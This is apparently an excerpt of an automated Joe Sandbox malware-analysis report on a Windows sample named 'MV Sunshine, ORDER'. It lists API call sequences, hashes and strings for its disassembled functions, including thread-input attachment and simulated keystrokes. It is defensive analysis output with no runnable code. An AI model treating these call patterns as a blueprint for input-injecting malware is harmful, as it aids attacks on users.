                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                      • String ID:
                      • API String ID: 1433390588-0
                      • Opcode ID: f6f057c82a177169609f16232e89dede760227b3671209a354fe5472a63c16ff
                      • Instruction ID: 90fed6f70bc1a4e1bc06a3c0630435917115f39b030341dd629678b0e4198c15
                      • Opcode Fuzzy Hash: f6f057c82a177169609f16232e89dede760227b3671209a354fe5472a63c16ff
                      • Instruction Fuzzy Hash: 4331B075A0529AAFCB12DFA1DC48EBF7BACEF09301F004525F911E6250D734DE528BA1
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 009E1700
                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009E0778,?,00000001), ref: 009E1714
                      • GetWindowThreadProcessId.USER32(00000000), ref: 009E171B
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0778,?,00000001), ref: 009E172A
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 009E173C
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0778,?,00000001), ref: 009E1755
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0778,?,00000001), ref: 009E1767
                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009E0778,?,00000001), ref: 009E17AC
                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0778,?,00000001), ref: 009E17C1
                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0778,?,00000001), ref: 009E17CC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: eda51dd2b49764128de40efd77a9f742b16c4044b6273b79fe3a37d52672c87e
                      • Instruction ID: 6489dc1500652e153ad7c18d341d14ec207167780024dcacbec38c840323688d
                      • Opcode Fuzzy Hash: eda51dd2b49764128de40efd77a9f742b16c4044b6273b79fe3a37d52672c87e
                      • Instruction Fuzzy Hash: 5D31B179600288BFDB22DF95DC84B7977EDAB5AB51F104014F804D62A0DB769D46CB50
                      APIs
                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0098FC06
                      • OleUninitialize.OLE32(?,00000000), ref: 0098FCA5
                      • UnregisterHotKey.USER32(?), ref: 0098FDFC
                      • DestroyWindow.USER32(?), ref: 009C4A00
                      • FreeLibrary.KERNEL32(?), ref: 009C4A65
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009C4A92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                      • String ID: close all
                      • API String ID: 469580280-3243417748
                      • Opcode ID: 83f9ee58dcccea141bab770f2ab08c5cd3e720b66ab94b32dd5e01047d7c6f76
                      • Instruction ID: 892b91ea296a4ee2fd4b85d7770ee3ed386a2746872e7261b561cf30e2d47118
                      • Opcode Fuzzy Hash: 83f9ee58dcccea141bab770f2ab08c5cd3e720b66ab94b32dd5e01047d7c6f76
                      • Instruction Fuzzy Hash: 11A17D34B012128FCB29EF54C4A5F69F768AF44700F5542ADE90AAB362DB30ED16CF95
                      APIs
                      • EnumChildWindows.USER32(?,009DAA64), ref: 009DA9A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ChildEnumWindows
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 3555792229-1603158881
                      • Opcode ID: fc1ccc1356516dfd33a55c4321966e0afe1386ed1e7c9427dd3d45bb2422bdf0
                      • Instruction ID: eec84daeeb9b06a24c10015ebf3236b1d67634d73f55ddfdb0b3583728b6c7f7
                      • Opcode Fuzzy Hash: fc1ccc1356516dfd33a55c4321966e0afe1386ed1e7c9427dd3d45bb2422bdf0
                      • Instruction Fuzzy Hash: 2B91C871A00606EBDB08DF70C491BE9FB79BF54304F50C11AE899A7391DF30AA69CB91
                      APIs
                      • SetWindowLongW.USER32(?,000000EB), ref: 00982EAE
                        • Part of subcall function 00981DB3: GetClientRect.USER32(?,?), ref: 00981DDC
                        • Part of subcall function 00981DB3: GetWindowRect.USER32(?,?), ref: 00981E1D
                        • Part of subcall function 00981DB3: ScreenToClient.USER32(?,?), ref: 00981E45
                      • GetDC.USER32 ref: 009BCF82
                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009BCF95
                      • SelectObject.GDI32(00000000,00000000), ref: 009BCFA3
                      • SelectObject.GDI32(00000000,00000000), ref: 009BCFB8
                      • ReleaseDC.USER32(?,00000000), ref: 009BCFC0
                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009BD04B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                      • String ID: U
                      • API String ID: 4009187628-3372436214
                      • Opcode ID: 73caa19e562e733180a7d496eb4431886fafc5d986339bb17ca09aaa28d43dd2
                      • Instruction ID: 1b5f740afa6bdb12e1c85a8ce9083086052e65c904f31cdbe0bb9f2bf3f4c59e
                      • Opcode Fuzzy Hash: 73caa19e562e733180a7d496eb4431886fafc5d986339bb17ca09aaa28d43dd2
                      • Instruction Fuzzy Hash: B7710570400209DFCF21EF64C984AFA7BBAFF49360F1442AAED555A2A6D7318C42DB60
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                        • Part of subcall function 00982344: GetCursorPos.USER32(?), ref: 00982357
                        • Part of subcall function 00982344: ScreenToClient.USER32(00A467B0,?), ref: 00982374
                        • Part of subcall function 00982344: GetAsyncKeyState.USER32(00000001), ref: 00982399
                        • Part of subcall function 00982344: GetAsyncKeyState.USER32(00000002), ref: 009823A7
                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00A0C2E4
                      • ImageList_EndDrag.COMCTL32 ref: 00A0C2EA
                      • ReleaseCapture.USER32 ref: 00A0C2F0
                      • SetWindowTextW.USER32(?,00000000), ref: 00A0C39A
                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A0C3AD
                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00A0C48F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                      • API String ID: 1924731296-2107944366
                      • Opcode ID: f985f9926a77fa4eaaf59a3e15f3e55cfe6c5b10aa79b78b5b2181f30d3a2ef7
                      • Instruction ID: 3cdf1e064d68eb123e153d3d0b0b65515abdd34c11f47e7c9f558b789c469b2f
                      • Opcode Fuzzy Hash: f985f9926a77fa4eaaf59a3e15f3e55cfe6c5b10aa79b78b5b2181f30d3a2ef7
                      • Instruction Fuzzy Hash: BB51AD78204308AFD714EF60D895F6A7BE1FBC9310F004A2DF5919B2E1DB71A945CB52
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A0F910), ref: 009F903D
                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A0F910), ref: 009F9071
                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009F91EB
                      • SysFreeString.OLEAUT32(?), ref: 009F9215
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                      • String ID:
                      • API String ID: 560350794-0
                      • Opcode ID: 7d44cd9b85bef67bb811605527b951b9418af3053c8e76ed40bb7aa3833f0fd1
                      • Instruction ID: 8989b753958da3482407ab718a2b58cd839fb71d41f4cb77f7d6779e6b65e733
                      • Opcode Fuzzy Hash: 7d44cd9b85bef67bb811605527b951b9418af3053c8e76ed40bb7aa3833f0fd1
                      • Instruction Fuzzy Hash: 92F11971A00109EFDB14DF94C888EBEB7B9FF89314F148459FA15AB250DB71AE46CB50
                      APIs
                      • _memset.LIBCMT ref: 009FF9C9
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FFB5C
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FFB80
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FFBC0
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FFBE2
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009FFD5E
                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009FFD90
                      • CloseHandle.KERNEL32(?), ref: 009FFDBF
                      • CloseHandle.KERNEL32(?), ref: 009FFE36
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                      • String ID:
                      • API String ID: 4090791747-0
                      • Opcode ID: d0099d6c7b02d4eaa71b456397f2e47651158aee70e3db3ec74f76b6383a42c4
                      • Instruction ID: 94b9a6b31d310d0186cc426a0cb7f3ae0451c29c31b623931909574e3a6e1e08
                      • Opcode Fuzzy Hash: d0099d6c7b02d4eaa71b456397f2e47651158aee70e3db3ec74f76b6383a42c4
                      • Instruction Fuzzy Hash: B0E1B2312043459FCB14EF24C891B7ABBE4AF85354F18886DF9999B3A2DB31DC45CB52
                      APIs
                        • Part of subcall function 009E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E38D3,?), ref: 009E48C7
                        • Part of subcall function 009E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E38D3,?), ref: 009E48E0
                        • Part of subcall function 009E4CD3: GetFileAttributesW.KERNEL32(?,009E3947), ref: 009E4CD4
                      • lstrcmpiW.KERNEL32(?,?), ref: 009E4FE2
                      • _wcscmp.LIBCMT ref: 009E4FFC
                      • MoveFileW.KERNEL32(?,?), ref: 009E5017
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                      • String ID:
                      • API String ID: 793581249-0
                      • Opcode ID: 0fbba9145169c45451ce6793ef91e99a94c2ba96288eecf335f7a9ccd91b0e5b
                      • Instruction ID: 34cad76afba368c6839e5f134053bd93572708c4905d16b37a50bd24aea013b1
                      • Opcode Fuzzy Hash: 0fbba9145169c45451ce6793ef91e99a94c2ba96288eecf335f7a9ccd91b0e5b
                      • Instruction Fuzzy Hash: 075163B20087859BC725EBA1C881ADFB3ECAFC5341F10492EF189D3151EF74E6898766
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A0896E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: d356a63c36d3cb25691d03f38ba0e5470beb0071abddbf52c3d65c98b206a2b0
                      • Instruction ID: 40e000b20469fc32d8b8d6cb574887be3ddc12f75227dbf4085aed08e53cbcce
                      • Opcode Fuzzy Hash: d356a63c36d3cb25691d03f38ba0e5470beb0071abddbf52c3d65c98b206a2b0
                      • Instruction Fuzzy Hash: 4F51D63060030CBFDF30DF28EC85BA93BA4BB15390F604112F591E66E1DF79A9848B89
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009BC547
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009BC569
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009BC581
                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009BC59F
                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009BC5C0
                      • DestroyIcon.USER32(00000000), ref: 009BC5CF
                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009BC5EC
                      • DestroyIcon.USER32(?), ref: 009BC5FB
                        • Part of subcall function 00A0A71E: DeleteObject.GDI32(00000000), ref: 00A0A757
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                      • String ID:
                      • API String ID: 2819616528-0
                      • Opcode ID: 0d2b40b00bd292da5b160308c2d18d9171a09b7828ab13c1a2cc35eaf4e6e5d9
                      • Instruction ID: 4285b4b83a080a2140bb61d9bf349cf8cd4cf19cf04b76e5589694d08b057297
                      • Opcode Fuzzy Hash: 0d2b40b00bd292da5b160308c2d18d9171a09b7828ab13c1a2cc35eaf4e6e5d9
                      • Instruction Fuzzy Hash: C5518BB4A00209AFDB20EF64CC45FAA37B9EB55720F104528F902E76A0DBB5ED81DB50
                      APIs
                        • Part of subcall function 009DAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 009DAE77
                        • Part of subcall function 009DAE57: GetCurrentThreadId.KERNEL32 ref: 009DAE7E
                        • Part of subcall function 009DAE57: AttachThreadInput.USER32(00000000,?,009D9B65,?,00000001), ref: 009DAE85
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D9B70
                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009D9B8D
                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009D9B90
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D9B99
                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009D9BB7
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D9BBA
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D9BC3
                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009D9BDA
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D9BDD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                      • String ID:
                      • API String ID: 2014098862-0
                      • Opcode ID: 1501b42a515079e8ca06caac44f2ca33d5dd529b98c9e07a4faf544bbc90f45b
                      • Instruction ID: c7bb53dc78f182ceeb00df1e782c11e8c5b3383f1c05422a464d3876bf6e7a46
                      • Opcode Fuzzy Hash: 1501b42a515079e8ca06caac44f2ca33d5dd529b98c9e07a4faf544bbc90f45b
                      • Instruction Fuzzy Hash: 5A11E171550618BFF620ABA0DC89F6A3B2DEB4C751F110426F344BB5A0CAF35C12DAB4
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009D8A84,00000B00,?,?), ref: 009D8E0C
                      • HeapAlloc.KERNEL32(00000000,?,009D8A84,00000B00,?,?), ref: 009D8E13
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009D8A84,00000B00,?,?), ref: 009D8E28
                      • GetCurrentProcess.KERNEL32(?,00000000,?,009D8A84,00000B00,?,?), ref: 009D8E30
                      • DuplicateHandle.KERNEL32(00000000,?,009D8A84,00000B00,?,?), ref: 009D8E33
                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009D8A84,00000B00,?,?), ref: 009D8E43
                      • GetCurrentProcess.KERNEL32(009D8A84,00000000,?,009D8A84,00000B00,?,?), ref: 009D8E4B
                      • DuplicateHandle.KERNEL32(00000000,?,009D8A84,00000B00,?,?), ref: 009D8E4E
                      • CreateThread.KERNEL32(00000000,00000000,009D8E74,00000000,00000000,00000000), ref: 009D8E68
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                      • String ID:
                      • API String ID: 1957940570-0
                      • Opcode ID: 9670acab613d3641e1e3bfd3cb6d380f6aefa098363b097c9a013d515002f56a
                      • Instruction ID: df2a86cecc2619c5caad7205be5426eb77ea331dd3a8f610fbe943a37593c26a
                      • Opcode Fuzzy Hash: 9670acab613d3641e1e3bfd3cb6d380f6aefa098363b097c9a013d515002f56a
                      • Instruction Fuzzy Hash: A501AC75240308FFE620EBA5DC4DF573B6CEB89711F004521FB05DB591CA7098028A20
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$_memset
                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                      • API String ID: 2862541840-625585964
                      • Opcode ID: e877e5ce67b002e7bfcd8ee679a6cd42017d3115b3e6035d7ad11c50c11de97d
                      • Instruction ID: 56eff546e5e8bce545ba09ae5062a77d2ecfdc133890f8af51d463e9bc7361c1
                      • Opcode Fuzzy Hash: e877e5ce67b002e7bfcd8ee679a6cd42017d3115b3e6035d7ad11c50c11de97d
                      • Instruction Fuzzy Hash: 6C91BF71A00219AFDF24DFA5C888FAEB7B8EF85710F108559FA15EB290D7709945CFA0
                      APIs
                        • Part of subcall function 009D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?,?,009D799D), ref: 009D766F
                        • Part of subcall function 009D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D768A
                        • Part of subcall function 009D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D7698
                        • Part of subcall function 009D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?), ref: 009D76A8
                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009F9B1B
                      • _memset.LIBCMT ref: 009F9B28
                      • _memset.LIBCMT ref: 009F9C6B
                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 009F9C97
                      • CoTaskMemFree.OLE32(?), ref: 009F9CA2
                      Strings
                      • NULL Pointer assignment, xrefs: 009F9CF0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                      • String ID: NULL Pointer assignment
                      • API String ID: 1300414916-2785691316
